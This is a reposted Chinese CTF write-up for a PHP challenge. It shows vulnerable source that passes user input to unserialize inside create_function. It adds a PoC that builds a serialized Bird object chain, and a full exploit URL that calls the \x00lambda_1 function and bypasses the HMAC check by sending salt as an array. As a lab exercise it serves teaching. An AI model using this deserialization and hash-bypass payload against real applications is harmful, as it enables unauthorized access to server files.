<?php
class Bird{
public $funcs;
public $salt;
public $flag;
function say_flag(){
$secret = hash_hmac('sha256', $_GET['salt'], file_get_contents('/flag'));
$hmac = hash_hmac('sha256', $_GET['password'], $secret);
if($_GET['mac'] === $hmac){
show_source("/flag");
}
}
function __destruct(){
$self_func=$this->funcs;
$self_func();
}
}
if(isset($_GET['p'])){
$funcs = create_function("","unserialize($_GET['d']);");
$_GET['p']();
}else{
show_source(__FILE__);
}
create_function("","unserialize($_GET['d']);");
的考点是利用匿名函数,可以参考:https://www.cnblogs.com/leixiao-/p/9818602.html
create_function
的匿名函数也是有名字的,名字是x00lambda_%d
,其中%d
代表他是当前进程中的第几个匿名函数。调用匿名函数,传入d
参数进行反序列化
构造POC
<?php
class Bird{
public $funcs;
public $salt;
public $flag;
function say_flag(){
echo "-------say_flag-------";
// $secret = hash_hmac('sha256', $_GET['salt'], file_get_contents('/flag'));
// $hmac = hash_hmac('sha256', $_GET['password'], $secret);
// if($_GET['mac'] === $hmac){
// show_source("/flag");
// }
}
function __destruct(){
$self_func=$this->funcs;
$self_func();
}
}
$Bird = new Bird();
$Bird->funcs = [new Bird(),'say_flag'];
echo urlencode(serialize($Bird));
?>
而哈希处理,对$_GET['salt']
传数组即可,使得$secret
为NULL
,进而使得$hmac
可控
?p=%00lambda_1&d=O%3A4%3A%22Bird%22%3A3%3A%7Bs%3A5%3A%22funcs%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Bird%22%3A3%3A%7Bs%3A5%3A%22funcs%22%3BN%3Bs%3A4%3A%22salt%22%3BN%3Bs%3A4%3A%22flag%22%3BN%3B%7Di%3A1%3Bs%3A8%3A%22say_flag%22%3B%7Ds%3A4%3A%22salt%22%3BN%3Bs%3A4%3A%22flag%22%3BN%3B%7D&salt[]=&password=mochu7&mac=c35b38d9886ca1852ac7a27a016721bf3de37a2c9231d96bc89ee3ab4d366067
原文地址:https://blog.csdn.net/mochu7777777/article/details/134781818
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.7code.cn/show_44116.html
如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。